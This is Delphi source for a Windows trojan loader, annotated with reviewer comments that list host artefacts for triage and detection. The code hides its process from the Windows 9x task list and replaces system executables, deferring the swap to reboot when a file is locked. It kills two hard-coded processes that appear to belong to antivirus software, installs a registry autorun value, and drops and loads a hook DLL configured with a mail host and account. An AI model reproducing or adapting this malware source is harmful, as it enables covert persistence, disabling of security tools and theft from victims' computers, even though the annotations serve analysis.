unit UnitMain;
interface
uses
Windows, SysUtils2, reg, unithooktype, other;
// Procedure types for the two entry points that Main resolves from the dropped
// DLL with GetProcAddress. StartHook receives the configuration text, a second
// string (Main passes '') and a boolean flag; StopHook takes no arguments.
type
TStartHook = procedure(data: pchar; BackDoor: pchar; VerTest: boolean); stdcall;
// Author's notes on the layouts the configuration text can take
// (leading digit, then host / account / optional password fields):
//0 html1xxxx
//1 163.com wed@163.com xxxx
//2 smtp.163.com wed@163.com pass xxxx
TStopHook = procedure; stdcall;
const
WM_CLOSE = $0010;
// Embedded configuration record. The live value is a short header (two digits,
// a mail host and a mail account, terminated by #0) followed by six lines of
// 'x' filler; an HTTP-form variant is left commented out on the first line.
// Main uses the first character as a flag (VerTest := first char <> '0') and
// hands everything after it to StartHook. Main also refuses to run when GetCRC
// over this string is non-zero and no '<sname>.dpr' sits next to the executable.
// NOTE(review): the fixed-width filler presumably reserves room for the real
// values to be patched into the compiled binary - confirm. For triage, this
// record is where the sample's mail host/account configuration lives.
consthtml1 = //'00 http://www.great.com/sendmailold.asp?tomail=we@163.com&MailBody='#0+
'01 pop3.vip.sina.com wen@vip.sina.com '#0 +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
procedure Main(door:string);
implementation
function GetCRC(consthtml1: string): integer;
// Additive checksum over the configuration string: the text is read as a run
// of 32-bit integers (four characters each) and the values are summed.
// Trailing characters that do not fill a whole 4-byte group are ignored, so
// any string shorter than four characters yields 0.
// Main treats a non-zero sum as a tampered/unpatched configuration.
// (An earlier variant, previously kept here as dead code, summed the program's
// own executable file instead of the configuration string.)
var
  groupCount, idx: integer;
begin
  result := 0;
  groupCount := length(consthtml1) div 4;
  idx := 0;
  while idx < groupCount do
  begin
    // Reinterpret characters [1 + idx*4 .. 4 + idx*4] as one integer.
    inc(result, pinteger(@consthtml1[1 + idx * 4])^);
    inc(idx);
  end;
end;
function WinExec2(ExeFile: string; ProcessInfo: PProcessInformation = nil): boolean;
// Starts ExeFile as a command line through CreateProcess and returns the API's
// success flag. ExeFile is passed as lpCommandLine (lpApplicationName is nil),
// so it may carry arguments. When the caller supplies ProcessInfo the process
// information is written there; otherwise it goes to a local record.
// NOTE(review): the process/thread handles returned in the process-information
// record are not closed in this function.
var
  startup: STARTUPINFO;
  scratchInfo: TProcessInformation;
  target: PProcessInformation;
begin
  // Prefer the caller's record; fall back to the local scratch record.
  target := ProcessInfo;
  if target = nil then
    target := @scratchInfo;
  ZeroMemory(@startup, sizeof(startup));
  startup.cb := sizeof(startup);
  result := CreateProcess(nil, Pchar(ExeFile), nil, nil, false, CREATE_DEFAULT_ERROR_MODE,
    nil, nil, startup, target^);
end;
function IsWindows9x: Boolean;
// Reports True when GetVersionEx does not identify the platform as NT-based.
// The rest of the unit uses this to pick between the Windows 9x and NT code paths.
// NOTE(review): the GetVersionEx return value is not checked.
var
  versionInfo: TOSVersionInfo;
begin
  versionInfo.dwOSVersionInfoSize := sizeof(versionInfo);
  GetVersionEx(versionInfo);
  result := not (versionInfo.dwPlatformID = Ver_Platform_Win32_NT);
end;
function ApplicationClassIfExists(WndClass: string): Boolean;
// Single-instance check: creates a named semaphore 'Semaphore' + WndClass and
// returns True only when the create succeeded and the object already existed.
// The handle is not closed here, so the named object stays alive after the
// call. For responders, that named semaphore is a host-side indicator that an
// instance is running.
var
  marker: THandle;
begin
  marker := CreateSemaphore(nil, 0, 1, pchar('Semaphore' + WndClass));
  // True if this semaphore already exists.
  Result := (marker <> 0) and (GetLastError() = ERROR_ALREADY_EXISTS);
end;
function GetMyWindowsDirectory: string;
// Returns the path reported by GetWindowsDirectory, with a trailing backslash
// appended when the API result does not already end in one.
var
  capacity, written: DWORD;
begin
  capacity := MAX_PATH + 1;
  setlength(result, capacity);
  written := GetWindowsDirectory(@result[1], capacity);
  // Shrink the buffer to the character count the API reported.
  setlength(result, written);
  // NOTE(review): a return of 0 (API failure) is not handled before indexing.
  if result[written] <> '\' then
    result := result + '\';
end;
function GetMySystemDirectory: string;
// Returns the path reported by GetSystemDirectory, with a trailing backslash
// appended when the API result does not already end in one.
var
  capacity, written: DWORD;
begin
  capacity := MAX_PATH + 1;
  setlength(result, capacity);
  written := GetSystemDirectory(@result[1], capacity);
  // Shrink the buffer to the character count the API reported.
  setlength(result, written);
  // NOTE(review): a return of 0 (API failure) is not handled before indexing.
  if result[written] <> '\' then
    result := result + '\';
end;
// Copies src over des, and when the direct overwrite fails, stages the file and
// schedules the replacement for the next reboot.
//   is9x - selects the Windows 9x mechanism (wininit.ini) instead of MoveFileEx.
//   src  - file to install; des - path to be replaced.
// Host artefacts an analyst can look for: a staging copy named des + '.ddd';
// on Windows 9x a [rename] entry in wininit.ini; on NT a delayed rename, which
// Windows records as a pending file-rename operation processed at boot.
// No result is returned, so callers cannot tell which path was taken or whether
// any of the calls failed.
procedure ForceCopyFile(is9x: boolean; src, des: string);
var
sbak: string;
lpDirSrc, lpDirDes: array[0..MAX_PATH + 1] of Char;
begin
// First attempt: plain overwrite (bFailIfExists = false).
if not copyfile(pchar(src), pchar(des), false) then
begin
// Destination could not be written: stage the file next to it instead.
sbak := des + '.ddd';
if copyfile(pchar(src), pchar(sbak), false) then
begin
if is9x then
begin
// wininit.ini takes short (8.3) paths; the entry is destination=staged copy.
// NOTE(review): GetShortPathName results are not checked.
GetShortPathName(pchar(sbak), lpDirSrc, MAX_PATH + 1);
GetShortPathName(pchar(des), lpDirDes, MAX_PATH + 1);
WritePrivateProfileString('rename', lpDirDes, lpDirSrc,
'wininit.ini');
end
else begin
// An earlier approach (kill the process using des, then retry) is left disabled.
//Killpro(extractfilename(des));
//sleep(1000);
//if not copyfile(pchar(src), pchar(des), false) then
//begin
// Replace des with the staged copy at the next reboot.
MoveFileEx(pchar(sbak), pchar(des),
MOVEFILE_REPLACE_EXISTING or MOVEFILE_DELAY_UNTIL_REBOOT);
//end;
end;
end;
end;
end;
// Windows 9x installation step (autorun1 calls this only on the 9x path).
// Keeps a copy of srcPath + Filename under desPath, then overwrites a file in
// srcPath with the running executable (paramstr(0)).
//   srcPath / desPath - directories, expected to end in '\'.
//   Filename          - name of the file being replaced.
// Returns False when srcPath + Filename does not exist, True otherwise (the
// result does not reflect whether the later copy steps succeeded).
// Slot selection: each candidate target has a '<target>.txt' marker holding an
// identifier (sname, defined elsewhere). A target whose marker matches sname,
// or the first target without a marker, is used; otherwise the next candidate
// is the first 7 characters of Filename + a letter + '.exe'.
// Host artefacts: '<target>.txt' marker files, a copy of the original file under
// desPath, and files named <7-char prefix><letter>.exe in srcPath.
function mycopy(is9x: boolean; srcpath, desPath, Filename: string): boolean;
var
des, src: string;
buf: array[0..100] of char;
i, h, size: Dword;
fileNamePre:string;
begin
fileNamePre:=copy(filename,1,7);
des := desPath + Filename;
src := srcPath + Filename;
if not fileexists(src) then
begin
result := false;
exit;
end;
// Preserve the existing file once; an existing copy is never overwritten.
if not fileexists(des) then
copyfile(pchar(src), pchar(des), false);
// i is the candidate letter code; it is incremented before use, so the first
// generated name uses $41 ('A').
i := $40;
while i <= $5A{Z} do
begin
if fileexists(src + '.txt') then
begin
h := fileopen(src + '.txt', fmopenread or fmShareDenyNone);
if h <> INVALID_HANDLE_VALUE then
begin
// NOTE(review): buf holds 101 chars and up to sizeof(buf) bytes are read, so a
// marker of 101 bytes or more makes buf[size] := #0 write one past the array.
// The readfile result is not checked either.
readfile(h, buf, sizeof(buf), size, nil);
if size <> 0 then
begin
buf[size] := #0;
// Marker matches this build's identifier: reuse this slot.
if strcomp(@buf, sname) = 0 then
begin
closehandle(h);
break;
end;
end;
closehandle(h);
end;
// Slot belongs to something else: move on to the next lettered name.
inc(i);
src := srcPath + fileNamePre + chr(i) + '.exe';
end
else begin
// Unclaimed slot: write the identifier into a new marker and use it.
h := filecreate(src + '.txt');
if h <> INVALID_HANDLE_VALUE then
begin
// NOTE(review): strcopy is unbounded; assumes sname fits in buf - confirm.
strcopy(@buf, sname);
filewrite(h, buf, strlen(sname));
closehandle(h);
end;
break;
end;
end;
// Killpro is defined elsewhere; presumably terminates the named process so the
// file can be replaced - confirm.
Killpro(extractfilename(src));
sleep(1000);
// Overwrite the chosen target with this executable (deferred to reboot if locked).
ForceCopyFile(is9x, paramstr(0), src);
result:=true;
end;
// Start-up routine called first by Main. Depending on the platform and on the
// name the program is running under it (1) on Windows 9x registers itself as a
// service process, (2) when running under a replaced file name on 9x, relaunches
// the next program in the chain with the original arguments, (3) otherwise
// installs itself (file replacement on 9x, copy + registry value on NT), and
// (4) exits if another instance is already running.
// fileRundll32, fileInternat, RootKey, Regpath1, RegValue, ClassName, Killpro
// and AddValue2 are defined outside this unit.
// Observable behaviour useful for detection: process termination by name, a
// copy of the executable under '<drive>:\Program Files\', a registry value
// pointing at that copy, and (9x) replaced files in the Windows/System folders.
procedure autorun1;
type
TRegisterServiceProcess = function(dwProcessID, dwType: Integer): Integer; stdcall;
var
fileRundll32Pre,fileInternatPre:string;
s, path, filename, filebak: string;
i: Integer;
h: THandle;
bInSpy, bInSpyRun, bInSpyInter: boolean;
RegisterServiceProcess: TRegisterServiceProcess;
path2,pathWin, pathSystem, pathProgram: string;
is9x: boolean;
begin
pathSystem := GetMySystemDirectory;
pathWin := GetMyWindowsDirectory;
// Program Files is assumed to be on the same drive as the Windows directory.
pathProgram := copy(pathWin, 1, 3) + 'Program Files\';
filename := extractfilename(paramstr(0));
path := extractfilepath(paramstr(0));
fileRundll32Pre:=copy(fileRundll32,1,7);
fileInternatPre:=copy(fileInternat,1,7);
// bInSpy*: the running file name starts with the 7-character prefix of one of
// the two target names, i.e. this process was started under a replaced name.
bInSpyRun := (ansicomparetext(copy(filename, 1, length(fileRundll32Pre)), fileRundll32Pre) = 0);
bInSpyInter := (ansicomparetext(copy(filename, 1, length(fileInternatPre)), fileInternatPre) = 0);
bInSpy := bInSpyRun or bInSpyInter;
is9x := IsWindows9x;
if is9x then
begin
// RegisterServiceProcess exists only on Windows 9x, hence the dynamic lookup.
// Registering as a service process (type 1) is commonly used there to keep a
// process out of the Close Program list.
// NOTE(review): the LoadLibrary result is not checked before use.
h := LoadLibrary('KERNEL32.DLL');
RegisterServiceProcess := GetProcAddress(h, 'RegisterServiceProcess');
if @RegisterServiceProcess <> nil then RegisterServiceProcess(GetCurrentProcessID, 1);
FreeLibrary(h);
end;
if is9x and bInSpy then
begin
// Strip the program name from the command line, leaving only the arguments in s.
s := trim(GetCommandLine);
if copy(s, 1, 1) = '"' then
begin
delete(s, 1, 1);
i := pos('"', s);
delete(s, 1, i + 1);
end
else begin
i := pos(' ', s);
if i = 0 then s := ''
else delete(s, 1, i);
end;
if bInSpyRun then
begin
// Work out the letter of the next program in the chain: 'A' ($41) when running
// under the exact target name, otherwise the letter after this file's own
// suffix letter ($20 when the suffix is not a single A-Z letter).
if ansicomparetext(filename,fileRundll32)=0 then i:=$41
else begin
filebak := uppercase(copy(filename, length(fileRundll32Pre) + 1, maxint));
i := pos('.', filebak);
if i <> 0 then
filebak := copy(filebak, 1, i - 1);
if(length(filebak)<>1)or(filebak[1]<'A')or(filebak[1]>'Z')then i:=$20
else i:=ord(filebak[1])+1;
// Skip the letter equal to the 7th character of the target name.
if ansicomparetext(chr(i),copy(fileRundll32,7,1))=0 then inc(i);
end;
// Run the next lettered file if present, else the preserved copy under
// Program Files, passing the original arguments through.
filebak := path + fileRundll32Pre + chr(i) + '.exe';
if fileexists(filebak) then
begin
filebak:='"' +filebak+ '" ' + s;
end
else begin
filebak:='"' + pathProgram + fileRundll32 + '" ' + s;
end;
WinExec2(filebak);
end
else //if bInSpyInter then
begin
// Same chain logic as above, for the second target name.
if ansicomparetext(filename,fileInternat)=0 then i:=$41
else begin
filebak := uppercase(copy(filename, length(fileInternatPre) + 1, maxint));
i := pos('.', filebak);
if i <> 0 then
filebak := copy(filebak, 1, i - 1);
if(length(filebak)<>1)or(filebak[1]<'A')or(filebak[1]>'Z')then i:=$20
else i:=ord(filebak[1])+1;
if ansicomparetext(chr(i),copy(fileInternat,7,1))=0 then inc(i);
end;
filebak := path + fileInternatPre + chr(i) + '.exe';
if fileexists(filebak) then
begin
filebak:='"' +filebak+ '" ' + s;
end
else begin
filebak:='"' + pathProgram + fileInternat + '" ' + s;
end;
WinExec2(filebak);
end;
end;
//writedat('exe:2');
// Not yet running under a replaced name: perform the installation.
if not bInSpy then
begin
if is9x then
begin
mycopy(is9x, pathWin, pathProgram, fileRundll32); //if the target file already exists, it is not copied
mycopy(is9x, pathSystem, pathProgram, fileInternat);
end
else begin
// Two hard-coded process names are passed to Killpro before installing.
// NOTE(review): presumably processes of a security product - confirm.
Killpro('KVXP.KXP');
Killpro('KVMonXP.KXP');
path2:=pathProgram;
// Copy this executable under Program Files; results are not checked.
copyfile(pchar(paramstr(0)), pchar(path2 + fileRundll32), false);
// Two alternative registry locations are left disabled below.
//AddValue2(HKEY_CLASSES_ROOT, 'exefile\shell\open\command', '', pchar('"'+pathProgram + fileRundll32+'" /c "%1" %*'));
//AddValue2(HKEY_CURRENT_USER, 'Software\Microsoft\Windows NT\CurrentVersion\Windows', 'load', pchar('"'+pathProgram + fileRundll32+'"'));
// Writes the path of the copy into a registry value whose key and name are
// defined elsewhere; presumably an auto-start location - confirm.
AddValue2(RootKey, Regpath1, RegValue, pchar(path2 + fileRundll32));
end;
end;
//writedat('exe:1');
// Single-instance guard: terminate if the named semaphore already existed.
if (ApplicationClassIfExists(ClassName)) then
begin
//showmessage('exists');
ExitProcess(0);
end;
end;
// Program entry point. Runs the install/guard routine, verifies the embedded
// configuration, writes the bundled DLL resource into the system directory,
// loads it, calls its StartHook export with the configuration, then loops
// once per second until a WM_CLOSE message is seen and calls StopHook.
//   door - not used in this procedure.
// killer, sname, file2 and ExtractRes are defined outside this unit.
// Observable behaviour useful for detection: a DLL written to the system
// directory by a non-installer process, followed by a load of that DLL and a
// long-lived process that wakes every second.
procedure Main(door:string);
var
StartHook: TStartHook;
StopHook: TStopHook;
msg: TMsg;
dllfile, s1: string;
Lib: THandle;
begin
autorun1;
// NOTE(review): killer is defined elsewhere; given the Killpro calls in
// autorun1 it presumably terminates processes - confirm.
killer;
s1 := consthtml1;
// Configuration integrity check: abort with a message box when the checksum is
// non-zero, unless '<sname>.dpr' exists next to the executable (which looks
// like a development-environment bypass).
if (GetCRC(s1) <> 0) and (not FileExists(extractfilepath(paramstr(0)) + sname + '.dpr'))
then
begin
Messagebox(0, 'error', '', 0);
exit;
end;
// Replace any existing copy of the DLL with the one from this program's resources.
dllfile := GetMySystemDirectory + file2;
if fileexists(dllfile) then
deletefile(pchar(dllfile));
ExtractRes('dll', 'dll1', dllfile);
// Load by bare name first (standard DLL search order), then by full path.
Lib := LoadLibrary(file2);
if Lib = 0 then
Lib := LoadLibrary(pchar(dllfile));
if Lib = 0 then exit;
// NOTE(review): neither export address is checked for nil before being called.
@StartHook := GetProcAddress(lib, 'StartHook');
@StopHook := GetProcAddress(lib, 'StopHook');
// Messagebox(0,pchar(s1),'',0);
// writedat(string(pchar(consthtml1))+':'+ string(pchar(consthtml2)),'c:\game.txt');
// exit;
// data = configuration without its first character; VerTest = first char <> '0'.
StartHook(pchar(copy(s1, 2, maxint)), '', copy(s1, 1, 1) <> '0');
while true do
begin
// NOTE(review): hinstance is passed in the window-handle position of PeekMessage.
if PeekMessage(Msg, hinstance, 0, 0, PM_REMOVE) then
begin
if (msg.message = WM_CLOSE {WM_QUIT}) then break;
TranslateMessage(msg);
DispatchMessage(msg);
end;
// At most one message is handled per second; killer runs on every pass.
sleep(1000);
killer;
end;
StopHook;
end;
initialization
finalization
end.